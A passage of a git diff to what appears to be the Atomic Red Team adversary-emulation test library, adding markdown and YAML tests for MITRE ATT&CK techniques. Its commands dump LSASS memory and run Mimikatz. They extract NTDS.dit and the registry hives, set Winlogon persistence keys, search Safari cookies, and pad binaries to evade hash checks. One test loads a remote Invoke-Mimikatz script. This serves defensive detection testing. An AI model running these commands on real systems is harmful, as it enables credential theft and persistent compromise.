functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
+DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)

-Detection: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.
+### Linux

-Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well. 
+#### Proc filesystem

-On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
-
-Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
-
-Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
-
-Platforms: Windows
-
-Data Sources: API monitoring, Process command-line parameters, Process monitoring, PowerShell logs
-
-Permissions Required: Administrator, SYSTEM
-
-Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>
+The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>

 ## Atomic Tests

@@ -147,6 +143,18 @@ Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>

 - [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)

+- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
+
+- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
+
+- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
+
+- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
+
+- [Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-9---create-volume-shadow-copy-with-ntdsdit)
+
+- [Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-10---copy-ntdsdit-from-volume-shadow-copy)
+

 <br/>

@@ -159,7 +167,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
+| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|

 #### Run it with `powershell`!
 ```
@@ -213,3 +221,134 @@ reg save HKLM\system system
 reg save HKLM\security security
 ```
 <br/>
+<br/>
+
+## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
+
+#### Run it with `command_prompt`!
+```
+procdump.exe -accepteula -ma lsass.exe #{output_file}
+```
+<br/>
+<br/>
+
+## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+Manager and administrative permissions.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with these steps!
+1. Open Task Manager:
+  On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+  on the task bar and selecting "Task Manager".
+
+2. Select lsass.exe:
+  If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+  and select it for manipulation.
+
+3. Dump lsass.exe memory:
+  Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Offline Credential Theft With Mimikatz
+The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
+
+#### Run it with these steps!
+1. Open Mimikatz:
+  Execute `mimikatz` at a command prompt.
+
+2. Select a Memory Dump:
+  Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
+
+3. Obtain Credentials:
+  Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
+The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+subsequent domain controllers without the need of network-based replication.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
+
+#### Run it with `command_prompt`!
+```
+ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
+```
+<br/>
+<br/>
+
+## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+#### Run it with `command_prompt`!
+```
+vssadmin.exe create shadow /for=#{drive_letter}
+```
+<br/>
+<br/>
+
+## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
+A successful test also requires the export of the SYSTEM Registry hive. 
+This test must be executed on a Windows Domain Controller.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
+| extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
+
+#### Run it with `command_prompt`!
+```
+copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
+copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
+reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
+```
+<br/>
@@ -12,7 +12,7 @@ atomic_tests:
    remote_script:
      description: URL to a remote Mimikatz script that dumps credentials
      type: Url
-      default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
+      default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
  executor:
    name: powershell
    command: |
@@ -55,3 +55,120 @@ atomic_tests:
      reg save HKLM\sam sam
      reg save HKLM\system system
      reg save HKLM\security security
+
+- name: Dump LSASS.exe Memory using ProcDump
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+    ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
+  supported_platforms:
+    - windows
+  input_arguments:
+    output_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: lsass_dump.dmp
+  executor:
+    name: command_prompt
+    command: |
+      procdump.exe -accepteula -ma lsass.exe #{output_file}
+
+- name: Dump LSASS.exe Memory using Windows Task Manager
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+    Manager and administrative permissions.
+  supported_platforms:
+    - windows
+  executor:
+    name: manual
+    steps: |
+      1. Open Task Manager:
+        On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+        on the task bar and selecting "Task Manager".
+
+      2. Select lsass.exe:
+        If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+        and select it for manipulation.
+
+      3. Dump lsass.exe memory:
+        Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
+
+
+- name: Offline Credential Theft With Mimikatz
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+    Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
+  supported_platforms:
+    - windows
+  input_arguments:
+    input_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: lsass_dump.dmp
+  executor:
+    name: manual
+    steps: |
+      1. Open Mimikatz:
+        Execute `mimikatz` at a command prompt.
+
+      2. Select a Memory Dump:
+        Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
+
+      3. Obtain Credentials:
+        Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
+
+- name: Dump Active Directory Database with NTDSUtil
+  description: |
+    The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+    uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+    subsequent domain controllers without the need of network-based replication.
+  supported_platforms:
+    - windows
+  input_arguments:
+    output_folder:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: C:\Atomic_Red_Team
+  executor:
+    name: command_prompt
+    command: |
+      ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
+
+- name: Create Volume Shadow Copy with NTDS.dit
+  description: |
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+    - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: "C:"
+  executor:
+    name: command_prompt
+    command: |
+      vssadmin.exe create shadow /for=#{drive_letter}
+
+- name: Copy NTDS.dit from Volume Shadow Copy
+  description: |
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+    This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
+    A successful test also requires the export of the SYSTEM Registry hive. 
+    This test must be executed on a Windows Domain Controller.
+  supported_platforms:
+    - windows
+  input_arguments:
+    vsc_name:
+      description: Name of Volume Shadow Copy
+      type: String
+      default: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+    extract_path:
+      description: Path for extracted NTDS.dit
+      type: Path
+      default: C:\Extract
+  executor:
+    name: command_prompt
+    command: |
+      copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
+      copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
+      reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
@@ -0,0 +1,76 @@
+# T1004 - Winlogon Helper DLL
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004)
+<blockquote>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) 
+
+Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
+
+* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
+* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
+* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
+
+Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell)
+
+- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell)
+
+- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)
+
+
+<br/>
+
+## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
+PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
+
+#### Run it with `powershell`!
+```
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
+PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
+
+#### Run it with `powershell`!
+```
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
+PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
+
+#### Run it with `powershell`!
+```
+New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+```
+<br/>
@@ -0,0 +1,59 @@
+---
+attack_technique: T1004
+display_name: Winlogon Helper DLL
+
+atomic_tests:
+- name: Winlogon Shell Key Persistence - PowerShell
+  description: |
+    PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    binary_to_execute:
+      description: Path of binary to execute
+      type: Path
+      default: C:\Windows\System32\cmd.exe
+
+  executor:
+    name: powershell
+    command: |
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
+
+- name: Winlogon Userinit Key Persistence - PowerShell
+  description: |
+    PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    binary_to_execute:
+      description: Path of binary to execute
+      type: Path
+      default: C:\Windows\System32\cmd.exe
+
+  executor:
+    name: powershell
+    command: |
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+
+- name: Winlogon Notify Key Logon Persistence - PowerShell
+  description: |
+    PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    binary_to_execute:
+      description: Path of notification package to execute
+      type: Path
+      default: C:\Windows\Temp\atomicNotificationPackage.dll
+
+  executor:
+    name: powershell
+    command: |
+      New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
@@ -0,0 +1,30 @@
+# T1005 - Data from Local System
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005)
+<blockquote>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
+
+Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies)
+
+
+<br/>
+
+## Atomic Test #1 - Search macOS Safari Cookies
+This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
+
+**Supported Platforms:** macOS
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| search_string | String to search Safari cookies to find. | string | coinbase|
+
+#### Run it with `sh`!
+```
+cd ~/Library/Cookies
+grep -q "#{search_string}" "Cookies.binarycookies"
+```
+<br/>
@@ -0,0 +1,23 @@
+---
+attack_technique: T1005
+display_name: Data from Local System
+
+atomic_tests:
+- name: Search macOS Safari Cookies
+  description: |
+    This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
+
+  supported_platforms:
+    - macos
+
+  input_arguments:
+    search_string:
+      description: String to search Safari cookies to find.
+      type: string
+      default: coinbase
+
+  executor:
+    name: sh
+    command: |
+      cd ~/Library/Cookies
+      grep -q "#{search_string}" "Cookies.binarycookies"
@@ -1,21 +1,13 @@
 # T1007 - System Service Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
-<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Windows
-
-Data Sources: Process command-line parameters, Process monitoring
-
-Permissions Required: User, Administrator, SYSTEM</blockquote>
+<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.</blockquote>

 ## Atomic Tests

 - [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)

+- [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe)
+

 <br/>

@@ -40,3 +32,21 @@ sc stop #{service_name}
 wmic service where (displayname like "#{service_name}") get name
 ```
 <br/>
+<br/>
+
+## Atomic Test #2 - System Service Discovery - net.exe
+Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
+
+#### Run it with `command_prompt`!
+```
+net.exe start >> #{output_file}
+```
+<br/>
@@ -25,3 +25,18 @@ atomic_tests:
      sc start #{service_name}
      sc stop #{service_name}
      wmic service where (displayname like "#{service_name}") get name
+
+- name: System Service Discovery - net.exe
+  description: |
+    Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
+  supported_platforms:
+    - windows
+  input_arguments:
+    output_file:
+      description: Path of file to hold net.exe output
+      type: Path
+      default: C:\Windows\Temp\service-list.txt
+  executor:
+    name: command_prompt
+    command: |
+      net.exe start >> #{output_file}
@@ -0,0 +1,27 @@
+# T1009 - Binary Padding
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
+<blockquote>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
+
+
+<br/>
+
+## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
+Uses dd to add a zero to the binary to change the hash
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
+
+#### Run it with `sh`!
+```
+dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
+```
+<br/>
@@ -0,0 +1,21 @@
+---
+attack_technique: T1009
+display_name: Binary Padding
+
+atomic_tests:
+- name: Pad Binary to Change Hash - Linux/macOS dd
+  description: |
+    Uses dd to add a zero to the binary to change the hash
+
+  supported_platforms:
+    - macos
+    - linux
+  input_arguments:
+    file_to_pad:
+      description: Path of binary to be padded
+      type: Path
+      default: /tmp/evil-binary
+  executor:
+    name: sh
+    command: |
+      dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
@@ -0,0 +1,31 @@
+# T1010 - Application Window Discovery
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
+<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
+
+In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)
+
+
+<br/>
+
+## Atomic Test #1 - List Process Main Windows - C# .NET
+Compiles and executes C# code to list main window titles associated with each process.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
+| output_file_name | Name of output binary | string | T1010.exe|
+
+#### Run it with `command_prompt`!
+```
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
+#{output_file_name}
+```
+<br/>
@@ -0,0 +1,27 @@
+---
+attack_technique: T1010
+display_name: Application Window Discovery
+
+atomic_tests:
+- name: List Process Main Windows - C# .NET
+  description: |
+    Compiles and executes C# code to list main window titles associated with each process.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    input_source_code:
+      description: Path to source of C# code
+      type: path
+      default: C:\AtomicRedTeam\atomics\T1010\src\T1010.cs
+    output_file_name:
+      description: Name of output binary
+      type: string
+      default: T1010.exe
+
+  executor:
+    name: command_prompt
+    command: |
+      C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
+      #{output_file_name}
@@ -0,0 +1,44 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+
+/*
+Author: Tony Lambert, Twitter: @ForensicITGuy
+License: MIT License
+Step One:
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe T1010.cs
+Step Two:
+T1010.exe
+*/
+
+namespace WindowLister
+{
+    class Lister 
+    {
+        static List<string> ListMainWindowTitles()
+        {
+            List<string> windowTitlesList = new List<string>();
+
+            Process[] processlist = Process.GetProcesses();
+
+            foreach (Process process in processlist)
+            {
+                string titleOutputLine;
+
+                if (!String.IsNullOrEmpty(process.MainWindowTitle))
+                {
+                    titleOutputLine = "Process: " + process.ProcessName + " ID: " + process.Id + " Main Window title: " + process.MainWindowTitle;
+                    windowTitlesList.Add(titleOutputLine);
+                }
+            }
+
+            return windowTitlesList;
+        }
+
+        static void Main(string[] args) 
+        {
+            List<string> windowTitlesList = ListMainWindowTitles();
+            windowTitlesList.ForEach(i => Console.Write("{0}\n", i));
+        }
+    }
+}
@@ -2,17 +2,7 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012)
 <blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

-The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Interaction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Windows
-
-Data Sources: Windows Registry, Process monitoring, Process command-line parameters
-
-Permissions Required: User, Administrator, SYSTEM</blockquote>
+The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.</blockquote>

 ## Atomic Tests

@@ -1,18 +1,8 @@
 # T1014 - Rootkit
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014)
-<blockquote>Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the System Firmware. (Citation: Wikipedia Rootkit)
+<blockquote>Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)

-Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
-
-Detection: Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: BIOS, MBR, System calls
-
-Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems, Process whitelisting, Signature-based detection, System access controls, Whitelisting by file name or path
-
-Permissions Required: Administrator, SYSTEM, root</blockquote>
+Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>

 ## Atomic Tests

@@ -20,7 +10,7 @@ Permissions Required: Administrator, SYSTEM, root</blockquote>

 - [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)

- [Atomic Test #3 - LD_PRELOAD based Rootkit](#atomic-test-3---ld_preload-based-rootkit)
+- [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test)


 <br/>
